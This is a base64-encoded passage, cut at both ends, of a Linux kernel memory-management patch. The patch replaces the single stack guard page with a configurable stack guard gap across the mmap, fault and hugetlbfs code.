VNOwotCQlpZiAoIXZtbSB8fCBhZGRyICsgbGVuIDw9IHZtbS0+dm1fc3RhcnQpCisJCWlmICghdm1tIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtbSkpCiAJCQlyZXR1cm4gYWRkcjsKIAkJYWRkciA9IHZtbS0+dm1fZW5kOwogCQlpZiAoZmxhZ3MgJiBNQVBfU0hBUkVEKQpkaWZmIC0tZ2l0IGEvZnMvaHVnZXRsYmZzL2lub2RlLmMgYi9mcy9odWdldGxiZnMvaW5vZGUuYwppbmRleCA0ZTVmMzMyLi5kYjdkODljIDEwMDY0NAotLS0gYS9mcy9odWdldGxiZnMvaW5vZGUuYworKysgYi9mcy9odWdldGxiZnMvaW5vZGUuYwpAQCAtMTY5LDcgKzE2OSw3IEBACiAJCWFkZHIgPSBBTElHTihhZGRyLCBodWdlX3BhZ2Vfc2l6ZShoKSk7CiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKZGlmZiAtLWdpdCBhL2ZzL3Byb2MvdGFza19tbXUuYyBiL2ZzL3Byb2MvdGFza19tbXUuYwppbmRleCBmN2NmMDRiLi5jZWQ0YTBiIDEwMDY0NAotLS0gYS9mcy9wcm9jL3Rhc2tfbW11LmMKKysrIGIvZnMvcHJvYy90YXNrX21tdS5jCkBAIC0zMjIsMTEgKzMyMiw3IEBACiAKIAkvKiBXZSBkb24ndCBzaG93IHRoZSBzdGFjayBndWFyZCBwYWdlIGluIC9wcm9jL21hcHMgKi8KIAlzdGFydCA9IHZtYS0+dm1fc3RhcnQ7Ci0JaWYgKHN0YWNrX2d1YXJkX3BhZ2Vfc3RhcnQodm1hLCBzdGFydCkpCi0JCXN0YXJ0ICs9IFBBR0VfU0laRTsKIAllbmQgPSB2bWEtPnZtX2VuZDsKLQlpZiAoc3RhY2tfZ3VhcmRfcGFnZV9lbmQodm1hLCBlbmQpKQotCQllbmQgLT0gUEFHRV9TSVpFOwogCiAJc2VxX3NldHdpZHRoKG0sIDI1ICsgc2l6ZW9mKHZvaWQgKikgKiA2IC0gMSk7CiAJc2VxX3ByaW50ZihtLCAiJTA4bHgtJTA4bHggJWMlYyVjJWMgJTA4bGx4ICUwMng6JTAyeCAlbHUgIiwKZGlmZiAtLWdpdCBhL2luY2x1ZGUvbGludXgvbW0uaCBiL2luY2x1ZGUvbGludXgvbW0uaAppbmRleCA2NzEzYmNkLi4xZWQ0YjRiIDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L21tLmgKKysrIGIvaW5jbHVkZS9saW51eC9tbS5oCkBAIC0xMDk4LDM0ICsxMDk4LDYgQEAKIGludCBjbGVhcl9wYWdlX2RpcnR5X2Zvcl9pbyhzdHJ1Y3QgcGFnZSAqcGFnZSk7CiBpbnQgZ2V0X2NtZGxpbmUoc3RydWN0IHRhc2tfc3RydWN0ICp0YXNrLCBjaGFyICpidWZmZXIsIGludCBidWZsZW4pOwogCi0vKiBJcyB0aGUgdm1hIGEgY29udGludWF0aW9uIG9mIHRoZSBzdGFjayB2bWEgYWJvdmUgaXQ/ICovCi1zdGF0aWMgaW5saW5lIGludCB2bWFfZ3Jvd3Nkb3duKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHIpCi17Ci0JcmV0dXJuIHZtYSAmJiAodm1hLT52bV9lbmQgPT0gYWRkcikgJiYgKHZtYS0+dm1fZmxhZ3MgJiBWTV9HUk9XU0RPV04pOwotfQotCi1zdGF0aWMgaW5saW5lIGludCBzdGFja19ndWFyZF9wYWdlX3N0YXJ0KHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLAotCQkJCQkgICAgIHVuc2lnbmVkIGxvbmcgYWRkcikKLXsKLQlyZXR1cm4gKHZtYS0+dm1fZmxhZ3MgJiBWTV9HUk9XU0RPV04pICYmCi0JCSh2bWEtPnZtX3N0YXJ0ID09IGFkZHIpICYmCi0JCSF2bWFfZ3Jvd3Nkb3duKHZtYS0+dm1fcHJldiwgYWRkcik7Ci19Ci0KLS8qIElzIHRoZSB2bWEgYSBjb250aW51YXRpb24gb2YgdGhlIHN0YWNrIHZtYSBiZWxvdyBpdD8gKi8KLXN0YXRpYyBpbmxpbmUgaW50IHZtYV9ncm93c3VwKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHIpCi17Ci0JcmV0dXJuIHZtYSAmJiAodm1hLT52bV9zdGFydCA9PSBhZGRyKSAmJiAodm1hLT52bV9mbGFncyAmIFZNX0dST1dTVVApOwotfQotCi1zdGF0aWMgaW5saW5lIGludCBzdGFja19ndWFyZF9wYWdlX2VuZChzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYSwKLQkJCQkJICAgdW5zaWduZWQgbG9uZyBhZGRyKQotewotCXJldHVybiAodm1hLT52bV9mbGFncyAmIFZNX0dST1dTVVApICYmCi0JCSh2bWEtPnZtX2VuZCA9PSBhZGRyKSAmJgotCQkhdm1hX2dyb3dzdXAodm1hLT52bV9uZXh0LCBhZGRyKTsKLX0KLQogZXh0ZXJuIHBpZF90CiB2bV9pc19zdGFjayhzdHJ1Y3QgdGFza19zdHJ1Y3QgKnRhc2ssIHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCBpbnQgaW5fZ3JvdXApOwogCkBAIC0xNjc3LDYgKzE2NDksNyBAQAogCQkJc3RydWN0IGFkZHJlc3Nfc3BhY2UgKm1hcHBpbmcsCiAJCQlzdHJ1Y3QgZmlsZSAqZmlscCk7CiAKK2V4dGVybiB1bnNpZ25lZCBsb25nIHN0YWNrX2d1YXJkX2dhcDsKIC8qIEdlbmVyaWMgZXhwYW5kIHN0YWNrIHdoaWNoIGdyb3dzIHRoZSBzdGFjayBhY2NvcmRpbmcgdG8gR1JPV1N7VVAsRE9XTn0gKi8KIGV4dGVybiBpbnQgZXhwYW5kX3N0YWNrKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHJlc3MpOwogCkBAIC0xNzA1LDYgKzE2NzgsMzAgQEAKIAlyZXR1cm4gdm1hOwogfQogCitzdGF0aWMgaW5saW5lIHVuc2lnbmVkIGxvbmcgdm1fc3RhcnRfZ2FwKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hKQoreworCXVuc2lnbmVkIGxvbmcgdm1fc3RhcnQgPSB2bWEtPnZtX3N0YXJ0OworCisJaWYgKHZtYS0+dm1fZmxhZ3MgJiBWTV9HUk9XU0RPV04pIHsKKwkJdm1fc3RhcnQgLT0gc3RhY2tfZ3VhcmRfZ2FwOworCQlpZiAodm1fc3RhcnQgPiB2bWEtPnZtX3N0YXJ0KQorCQkJdm1fc3RhcnQgPSAwOworCX0KKwlyZXR1cm4gdm1fc3RhcnQ7Cit9CisKK3N0YXRpYyBpbmxpbmUgdW5zaWduZWQgbG9uZyB2bV9lbmRfZ2FwKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hKQoreworCXVuc2lnbmVkIGxvbmcgdm1fZW5kID0gdm1hLT52bV9lbmQ7CisKKwlpZiAodm1hLT52bV9mbGFncyAmIFZNX0dST1dTVVApIHsKKwkJdm1fZW5kICs9IHN0YWNrX2d1YXJkX2dhcDsKKwkJaWYgKHZtX2VuZCA8IHZtYS0+dm1fZW5kKQorCQkJdm1fZW5kID0gLVBBR0VfU0laRTsKKwl9CisJcmV0dXJuIHZtX2VuZDsKK30KKwogc3RhdGljIGlubGluZSB1bnNpZ25lZCBsb25nIHZtYV9wYWdlcyhzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYSkKIHsKIAlyZXR1cm4gKHZtYS0+dm1fZW5kIC0gdm1hLT52bV9zdGFydCkgPj4gUEFHRV9TSElGVDsKZGlmZiAtLWdpdCBhL21tL21lbW9yeS5jIGIvbW0vbWVtb3J5LmMKaW5kZXggMGMwMzQyNS4uZWQ5MGJlMyAxMDA2NDQKLS0tIGEvbW0vbWVtb3J5LmMKKysrIGIvbW0vbWVtb3J5LmMKQEAgLTE0NzgsOCArMTQ3OCw2IEBACiAJcmV0dXJuIGFsbG9jX3BhZ2UoR0ZQX0hJR0hVU0VSKTsKIH0KIAotc3RhdGljIGlubGluZSBpbnQgc3RhY2tfZ3VhcmRfcGFnZShzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYSwgdW5zaWduZWQgbG9uZyBhZGRyKTsKLQogc3RhdGljIGJvb2wgX19uZWVkX21pZ3JhdGVfY21hX3BhZ2Uoc3RydWN0IHBhZ2UgKnBhZ2UsCiAJCQkJc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsCiAJCQkJdW5zaWduZWQgbG9uZyBzdGFydCwgdW5zaWduZWQgaW50IGZsYWdzKQpAQCAtMTc5MSwxMiArMTc4OSw2IEBACiAJcmV0dXJuIHBhZ2U7CiB9CiAKLXN0YXRpYyBpbmxpbmUgaW50IHN0YWNrX2d1YXJkX3BhZ2Uoc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsIHVuc2lnbmVkIGxvbmcgYWRkcikKLXsKLQlyZXR1cm4gc3RhY2tfZ3VhcmRfcGFnZV9zdGFydCh2bWEsIGFkZHIpIHx8Ci0JICAgICAgIHN0YWNrX2d1YXJkX3BhZ2VfZW5kKHZtYSwgYWRkcitQQUdFX1NJWkUpOwotfQotCiAvKioKICAqIF9fZ2V0X3VzZXJfcGFnZXMoKSAtIHBpbiB1c2VyIHBhZ2VzIGluIG1lbW9yeQogICogQHRzazoJdGFza19zdHJ1Y3Qgb2YgdGFyZ2V0IHRhc2sKQEAgLTE5NzcsMTEgKzE5NjksNiBAQAogCQkJCWludCByZXQ7CiAJCQkJdW5zaWduZWQgaW50IGZhdWx0X2ZsYWdzID0gMDsKIAotCQkJCS8qIEZvciBtbG9jaywganVzdCBza2lwIHRoZSBzdGFjayBndWFyZCBwYWdlLiAqLwotCQkJCWlmIChmb2xsX2ZsYWdzICYgRk9MTF9NTE9DSykgewotCQkJCQlpZiAoc3RhY2tfZ3VhcmRfcGFnZSh2bWEsIHN0YXJ0KSkKLQkJCQkJCWdvdG8gbmV4dF9wYWdlOwotCQkJCX0KIAkJCQlpZiAoZm9sbF9mbGFncyAmIEZPTExfV1JJVEUpCiAJCQkJCWZhdWx0X2ZsYWdzIHw9IEZBVUxUX0ZMQUdfV1JJVEU7CiAJCQkJaWYgKG5vbmJsb2NraW5nKQpAQCAtMzM1Myw0MCArMzM0MCw2IEBACiB9CiAKIC8qCi0gKiBUaGlzIGlzIGxpa2UgYSBzcGVjaWFsIHNpbmdsZS1wYWdlICJleHBhbmRfe2Rvd258dXB9d2FyZHMoKSIsCi0gKiBleGNlcHQgd2UgbXVzdCBmaXJzdCBtYWtlIHN1cmUgdGhhdCAnYWRkcmVzc3stfCt9UEFHRV9TSVpFJwotICogZG9lc24ndCBoaXQgYW5vdGhlciB2bWEuCi0gKi8KLXN0YXRpYyBpbmxpbmUgaW50IGNoZWNrX3N0YWNrX2d1YXJkX3BhZ2Uoc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsIHVuc2lnbmVkIGxvbmcgYWRkcmVzcykKLXsKLQlhZGRyZXNzICY9IFBBR0VfTUFTSzsKLQlpZiAoKHZtYS0+dm1fZmxhZ3MgJiBWTV9HUk9XU0RPV04pICYmIGFkZHJlc3MgPT0gdm1hLT52bV9zdGFydCkgewotCQlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnByZXYgPSB2bWEtPnZtX3ByZXY7Ci0KLQkJLyoKLQkJICogSXMgdGhlcmUgYSBtYXBwaW5nIGFidXR0aW5nIHRoaXMgb25lIGJlbG93PwotCQkgKgotCQkgKiBUaGF0J3Mgb25seSBvayBpZiBpdCdzIHRoZSBzYW1lIHN0YWNrIG1hcHBpbmcKLQkJICogdGhhdCBoYXMgZ290dGVuIHNwbGl0Li4KLQkJICovCi0JCWlmIChwcmV2ICYmIHByZXYtPnZtX2VuZCA9PSBhZGRyZXNzKQotCQkJcmV0dXJuIHByZXYtPnZtX2ZsYWdzICYgVk1fR1JPV1NET1dOID8gMCA6IC1FTk9NRU07Ci0KLQkJcmV0dXJuIGV4cGFuZF9kb3dud2FyZHModm1hLCBhZGRyZXNzIC0gUEFHRV9TSVpFKTsKLQl9Ci0JaWYgKCh2bWEtPnZtX2ZsYWdzICYgVk1fR1JPV1NVUCkgJiYgYWRkcmVzcyArIFBBR0VfU0laRSA9PSB2bWEtPnZtX2VuZCkgewotCQlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKm5leHQgPSB2bWEtPnZtX25leHQ7Ci0KLQkJLyogQXMgVk1fR1JPV1NET1dOIGJ1dCBzL2JlbG93L2Fib3ZlLyAqLwotCQlpZiAobmV4dCAmJiBuZXh0LT52bV9zdGFydCA9PSBhZGRyZXNzICsgUEFHRV9TSVpFKQotCQkJcmV0dXJuIG5leHQtPnZtX2ZsYWdzICYgVk1fR1JPV1NVUCA/IDAgOiAtRU5PTUVNOwotCi0JCXJldHVybiBleHBhbmRfdXB3YXJkcyh2bWEsIGFkZHJlc3MgKyBQQUdFX1NJWkUpOwotCX0KLQlyZXR1cm4gMDsKLX0KLQotLyoKICAqIFdlIGVudGVyIHdpdGggbm9uLWV4Y2x1c2l2ZSBtbWFwX3NlbSAodG8gZXhjbHVkZSB2bWEgY2hhbmdlcywKICAqIGJ1dCBhbGxvdyBjb25jdXJyZW50IGZhdWx0cyksIGFuZCBwdGUgbWFwcGVkIGJ1dCBub3QgeWV0IGxvY2tlZC4KICAqIFdlIHJldHVybiB3aXRoIG1tYXBfc2VtIHN0aWxsIGhlbGQsIGJ1dCBwdGUgdW5tYXBwZWQgYW5kIHVubG9ja2VkLgpAQCAtMzQwNCwxMCArMzM1Nyw2IEBACiAJLyogRmlsZSBtYXBwaW5nIHdpdGhvdXQgLT52bV9vcHMgPyAqLwogCWlmICh2bWEtPnZtX2ZsYWdzICYgVk1fU0hBUkVEKQogCQlyZXR1cm4gVk1fRkFVTFRfU0lHQlVTOwotCi0JLyogQ2hlY2sgaWYgd2UgbmVlZCB0byBhZGQgYSBndWFyZCBwYWdlIHRvIHRoZSBzdGFjayAqLwotCWlmIChjaGVja19zdGFja19ndWFyZF9wYWdlKHZtYSwgYWRkcmVzcykgPCAwKQotCQlyZXR1cm4gVk1fRkFVTFRfU0lHU0VHVjsKIAogCS8qIFVzZSB0aGUgemVyby1wYWdlIGZvciByZWFkcyAqLwogCWlmICghKGZsYWdzICYgRkFVTFRfRkxBR19XUklURSkpIHsKZGlmZiAtLWdpdCBhL21tL21tYXAuYyBiL21tL21tYXAuYwppbmRleCA0NzY3YjlkLi43MGNmMzJlIDEwMDY0NAotLS0gYS9tbS9tbWFwLmMKKysrIGIvbW0vbW1hcC5jCkBAIC0yNzUsNiArMjc1LDcgQEAKIAl1bnNpZ25lZCBsb25nIHJsaW0sIHJldHZhbDsKIAl1bnNpZ25lZCBsb25nIG5ld2Jyaywgb2xkYnJrOwogCXN0cnVjdCBtbV9zdHJ1Y3QgKm1tID0gY3VycmVudC0+bW07CisJc3RydWN0IHZtX2FyZWFfc3RydWN0ICpuZXh0OwogCXVuc2lnbmVkIGxvbmcgbWluX2JyazsKIAlib29sIHBvcHVsYXRlOwogCkBAIC0zMjAsNyArMzIxLDggQEAKIAl9CiAKIAkvKiBDaGVjayBhZ2FpbnN0IGV4aXN0aW5nIG1tYXAgbWFwcGluZ3MuICovCi0JaWYgKGZpbmRfdm1hX2ludGVyc2VjdGlvbihtbSwgb2xkYnJrLCBuZXdicmsrUEFHRV9TSVpFKSkKKwluZXh0ID0gZmluZF92bWEobW0sIG9sZGJyayk7CisJaWYgKG5leHQgJiYgbmV3YnJrICsgUEFHRV9TSVpFID4gdm1fc3RhcnRfZ2FwKG5leHQpKQogCQlnb3RvIG91dDsKIAogCS8qIE9rLCBsb29rcyBnb29kIC0gbGV0IGl0IHJpcC4gKi8KQEAgLTM0MywxMCArMzQ1LDIyIEBACiAKIHN0YXRpYyBsb25nIHZtYV9jb21wdXRlX3N1YnRyZWVfZ2FwKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hKQogewotCXVuc2lnbmVkIGxvbmcgbWF4LCBzdWJ0cmVlX2dhcDsKLQltYXggPSB2bWEtPnZtX3N0YXJ0OwotCWlmICh2bWEtPnZtX3ByZXYpCi0JCW1heCAtPSB2bWEtPnZtX3ByZXYtPnZtX2VuZDsKKwl1bnNpZ25lZCBsb25nIG1heCwgcHJldl9lbmQsIHN1YnRyZWVfZ2FwOworCisJLyoKKwkgKiBOb3RlOiBpbiB0aGUgcmFyZSBjYXNlIG9mIGEgVk1fR1JPV1NET1dOIGFib3ZlIGEgVk1fR1JPV1NVUCwgd2UKKwkgKiBhbGxvdyB0d28gc3RhY2tfZ3VhcmRfZ2FwcyBiZXR3ZWVuIHRoZW0gaGVyZSwgYW5kIHdoZW4gY2hvb3NpbmcKKwkgKiBhbiB1bm1hcHBlZCBhcmVhOyB3aGVyZWFzIHdoZW4gZXhwYW5kaW5nIHdlIG9ubHkgcmVxdWlyZSBvbmUuCisJICogVGhhdCdzIGEgbGl0dGxlIGluY29uc2lzdGVudCwgYnV0IGtlZXBzIHRoZSBjb2RlIGhlcmUgc2ltcGxlci4KKwkgKi8KKwltYXggPSB2bV9zdGFydF9nYXAodm1hKTsKKwlpZiAodm1hLT52bV9wcmV2KSB7CisJCXByZXZfZW5kID0gdm1fZW5kX2dhcCh2bWEtPnZtX3ByZXYpOworCQlpZiAobWF4ID4gcHJldl9lbmQpCisJCQltYXggLT0gcHJldl9lbmQ7CisJCWVsc2UKKwkJCW1heCA9IDA7CisJfQogCWlmICh2bWEtPnZtX3JiLnJiX2xlZnQpIHsKIAkJc3VidHJlZV9nYXAgPSByYl9lbnRyeSh2bWEtPnZtX3JiLnJiX2xlZnQsCiAJCQkJc3RydWN0IHZtX2FyZWFfc3RydWN0LCB2bV9yYiktPnJiX3N1YnRyZWVfZ2FwOwpAQCAtNDMwLDcgKzQ0NCw3IEBACiAJCWxpc3RfZm9yX2VhY2hfZW50cnkoYXZjLCAmdm1hLT5hbm9uX3ZtYV9jaGFpbiwgc2FtZV92bWEpCiAJCQlhbm9uX3ZtYV9pbnRlcnZhbF90cmVlX3ZlcmlmeShhdmMpOwogCQl2bWFfdW5sb2NrX2Fub25fdm1hKHZtYSk7Ci0JCWhpZ2hlc3RfYWRkcmVzcyA9IHZtYS0+dm1fZW5kOworCQloaWdoZXN0X2FkZHJlc3MgPSB2bV9lbmRfZ2FwKHZtYSk7CiAJCXZtYSA9IHZtYS0+dm1fbmV4dDsKIAkJaSsrOwogCX0KQEAgLTU5OCw3ICs2MTIsNyBAQAogCWlmICh2bWEtPnZtX25leHQpCiAJCXZtYV9nYXBfdXBkYXRlKHZtYS0+dm1fbmV4dCk7CiAJZWxzZQotCQltbS0+aGlnaGVzdF92bV9lbmQgPSB2bWEtPnZtX2VuZDsKKwkJbW0tPmhpZ2hlc3Rfdm1fZW5kID0gdm1fZW5kX2dhcCh2bWEpOwogCiAJLyoKIAkgKiB2bWEtPnZtX3ByZXYgd2Fzbid0IGtub3duIHdoZW4gd2UgZm9sbG93ZWQgdGhlIHJidHJlZSB0byBmaW5kIHRoZQpAQCAtODQ3LDcgKzg2MSw3IEBACiAJCQl2bWFfZ2FwX3VwZGF0ZSh2bWEpOwogCQlpZiAoZW5kX2NoYW5nZWQpIHsKIAkJCWlmICghbmV4dCkKLQkJCQltbS0+aGlnaGVzdF92bV9lbmQgPSBlbmQ7CisJCQkJbW0tPmhpZ2hlc3Rfdm1fZW5kID0gdm1fZW5kX2dhcCh2bWEpOwogCQkJZWxzZSBpZiAoIWFkanVzdF9uZXh0KQogCQkJCXZtYV9nYXBfdXBkYXRlKG5leHQpOwogCQl9CkBAIC04OTAsNyArOTA0LDcgQEAKIAkJZWxzZSBpZiAobmV4dCkKIAkJCXZtYV9nYXBfdXBkYXRlKG5leHQpOwogCQllbHNlCi0JCQltbS0+aGlnaGVzdF92bV9lbmQgPSBlbmQ7CisJCQlXQVJOX09OKG1tLT5oaWdoZXN0X3ZtX2VuZCAhPSB2bV9lbmRfZ2FwKHZtYSkpOwogCX0KIAlpZiAoaW5zZXJ0ICYmIGZpbGUpCiAJCXVwcm9iZV9tbWFwKGluc2VydCk7CkBAIC0xNjkxLDcgKzE3MDUsNyBAQAogCiAJd2hpbGUgKHRydWUpIHsKIAkJLyogVmlzaXQgbGVmdCBzdWJ0cmVlIGlmIGl0IGxvb2tzIHByb21pc2luZyAqLwotCQlnYXBfZW5kID0gdm1hLT52bV9zdGFydDsKKwkJZ2FwX2VuZCA9IHZtX3N0YXJ0X2dhcCh2bWEpOwogCQlpZiAoZ2FwX2VuZCA+PSBsb3dfbGltaXQgJiYgdm1hLT52bV9yYi5yYl9sZWZ0KSB7CiAJCQlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKmxlZnQgPQogCQkJCXJiX2VudHJ5KHZtYS0+dm1fcmIucmJfbGVmdCwKQEAgLTE3MDIsNyArMTcxNiw3IEBACiAJCQl9CiAJCX0KIAotCQlnYXBfc3RhcnQgPSB2bWEtPnZtX3ByZXYgPyB2bWEtPnZtX3ByZXYtPnZtX2VuZCA6IDA7CisJCWdhcF9zdGFydCA9IHZtYS0+dm1fcHJldiA/IHZtX2VuZF9nYXAodm1hLT52bV9wcmV2KSA6IDA7CiBjaGVja19jdXJyZW50OgogCQkvKiBDaGVjayBpZiBjdXJyZW50IG5vZGUgaGFzIGEgc3VpdGFibGUgZ2FwICovCiAJCWlmIChnYXBfc3RhcnQgPiBoaWdoX2xpbWl0KQpAQCAtMTcyOSw4ICsxNzQzLDggQEAKIAkJCXZtYSA9IHJiX2VudHJ5KHJiX3BhcmVudChwcmV2KSwKIAkJCQkgICAgICAgc3RydWN0IHZtX2FyZWFfc3RydWN0LCB2bV9yYik7CiAJCQlpZiAocHJldiA9PSB2bWEtPnZtX3JiLnJiX2xlZnQpIHsKLQkJCQlnYXBfc3RhcnQgPSB2bWEtPnZtX3ByZXYtPnZtX2VuZDsKLQkJCQlnYXBfZW5kID0gdm1hLT52bV9zdGFydDsKKwkJCQlnYXBfc3RhcnQgPSB2bV9lbmRfZ2FwKHZtYS0+dm1fcHJldik7CisJCQkJZ2FwX2VuZCA9IHZtX3N0YXJ0X2dhcCh2bWEpOwogCQkJCWdvdG8gY2hlY2tfY3VycmVudDsKIAkJCX0KIAkJfQpAQCAtMTc5NCw3ICsxODA4LDcgQEAKIAogCXdoaWxlICh0cnVlKSB7CiAJCS8qIFZpc2l0IHJpZ2h0IHN1YnRyZWUgaWYgaXQgbG9va3MgcHJvbWlzaW5nICovCi0JCWdhcF9zdGFydCA9IHZtYS0+dm1fcHJldiA/IHZtYS0+dm1fcHJldi0+dm1fZW5kIDogMDsKKwkJZ2FwX3N0YXJ0ID0gdm1hLT52bV9wcmV2ID8gdm1fZW5kX2dhcCh2bWEtPnZtX3ByZXYpIDogMDsKIAkJaWYgKGdhcF9zdGFydCA8PSBoaWdoX2xpbWl0ICYmIHZtYS0+dm1fcmIucmJfcmlnaHQpIHsKIAkJCXN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqcmlnaHQgPQogCQkJCXJiX2VudHJ5KHZtYS0+dm1fcmIucmJfcmlnaHQsCkBAIC0xODA3LDcgKzE4MjEsNyBAQAogCiBjaGVja19jdXJyZW50OgogCQkvKiBDaGVjayBpZiBjdXJyZW50IG5vZGUgaGFzIGEgc3VpdGFibGUgZ2FwICovCi0JCWdhcF9lbmQgPSB2bWEtPnZtX3N0YXJ0OworCQlnYXBfZW5kID0gdm1fc3RhcnRfZ2FwKHZtYSk7CiAJCWlmIChnYXBfZW5kIDwgbG93X2xpbWl0KQogCQkJcmV0dXJuIC1FTk9NRU07CiAJCWlmIChnYXBfc3RhcnQgPD0gaGlnaF9saW1pdCAmJiBnYXBfZW5kIC0gZ2FwX3N0YXJ0ID49IGxlbmd0aCkKQEAgLTE4MzMsNyArMTg0Nyw3IEBACiAJCQkJICAgICAgIHN0cnVjdCB2bV9hcmVhX3N0cnVjdCwgdm1fcmIpOwogCQkJaWYgKHByZXYgPT0gdm1hLT52bV9yYi5yYl9yaWdodCkgewogCQkJCWdhcF9zdGFydCA9IHZtYS0+dm1fcHJldiA/Ci0JCQkJCXZtYS0+dm1fcHJldi0+dm1fZW5kIDogMDsKKwkJCQkJdm1fZW5kX2dhcCh2bWEtPnZtX3ByZXYpIDogMDsKIAkJCQlnb3RvIGNoZWNrX2N1cnJlbnQ7CiAJCQl9CiAJCX0KQEAgLTE4NzEsNyArMTg4NSw3IEBACiAJCXVuc2lnbmVkIGxvbmcgbGVuLCB1bnNpZ25lZCBsb25nIHBnb2ZmLCB1bnNpZ25lZCBsb25nIGZsYWdzKQogewogCXN0cnVjdCBtbV9zdHJ1Y3QgKm1tID0gY3VycmVudC0+bW07Ci0Jc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWE7CisJc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsICpwcmV2OwogCXN0cnVjdCB2bV91bm1hcHBlZF9hcmVhX2luZm8gaW5mbzsKIAogCWlmIChsZW4gPiBUQVNLX1NJWkUgLSBtbWFwX21pbl9hZGRyKSB7CkBAIC0xODg3LDkgKzE5MDEsMTAgQEAKIAogCWlmIChhZGRyKSB7CiAJCWFkZHIgPSBQQUdFX0FMSUdOKGFkZHIpOwotCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CisJCXZtYSA9IGZpbmRfdm1hX3ByZXYobW0sIGFkZHIsICZwcmV2KTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmIGFkZHIgPj0gbW1hcF9taW5fYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpICYmCisJCSAgICAoIXByZXYgfHwgYWRkciA+PSB2bV9lbmRfZ2FwKHByZXYpKSkKIAkJCXJldHVybiBhZGRyOwogCX0KIApAQCAtMTkyMCw3ICsxOTM1LDcgQEAKIAkJCSAgY29uc3QgdW5zaWduZWQgbG9uZyBsZW4sIGNvbnN0IHVuc2lnbmVkIGxvbmcgcGdvZmYsCiAJCQkgIGNvbnN0IHVuc2lnbmVkIGxvbmcgZmxhZ3MpCiB7Ci0Jc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWE7CisJc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsICpwcmV2OwogCXN0cnVjdCBtbV9zdHJ1Y3QgKm1tID0gY3VycmVudC0+bW07CiAJdW5zaWduZWQgbG9uZyBhZGRyID0gYWRkcjA7CiAJc3RydWN0IHZtX3VubWFwcGVkX2FyZWFfaW5mbyBpbmZvOwpAQCAtMTk0MSw5ICsxOTU2LDEwIEBACiAJLyogcmVxdWVzdGluZyBhIHNwZWNpZmljIGFkZHJlc3MgKi8KIAlpZiAoYWRkcikgewogCQlhZGRyID0gUEFHRV9BTElHTihhZGRyKTsKLQkJdm1hID0gZmluZF92bWEobW0sIGFkZHIpOworCQl2bWEgPSBmaW5kX3ZtYV9wcmV2KG1tLCBhZGRyLCAmcHJldik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJiBhZGRyID49IG1tYXBfbWluX2FkZHIgJiYKLQkJCQkoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkJCSghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpICYmCisJCQkJKCFwcmV2IHx8IGFkZHIgPj0gdm1fZW5kX2dhcChwcmV2KSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKQEAgLTIwNzYsMjEgKzIwOTIsMTkgQEAKICAqIHVwZGF0ZSBhY2NvdW50aW5nLiBUaGlzIGlzIHNoYXJlZCB3aXRoIGJvdGggdGhlCiAgKiBncm93LXVwIGFuZCBncm93LWRvd24gY2FzZXMuCiAgKi8KLXN0YXRpYyBpbnQgYWNjdF9zdGFja19ncm93dGgoc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsIHVuc2lnbmVkIGxvbmcgc2l6ZSwgdW5zaWduZWQgbG9uZyBncm93KQorc3RhdGljIGludCBhY2N0X3N0YWNrX2dyb3d0aChzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYSwKKwkJCSAgICAgdW5zaWduZWQgbG9uZyBzaXplLCB1bnNpZ25lZCBsb25nIGdyb3cpCiB7CiAJc3RydWN0IG1tX3N0cnVjdCAqbW0gPSB2bWEtPnZtX21tOwogCXN0cnVjdCBybGltaXQgKnJsaW0gPSBjdXJyZW50LT5zaWduYWwtPnJsaW07Ci0JdW5zaWduZWQgbG9uZyBuZXdfc3RhcnQsIGFjdHVhbF9zaXplOworCXVuc2lnbmVkIGxvbmcgbmV3X3N0YXJ0OwogCiAJLyogYWRkc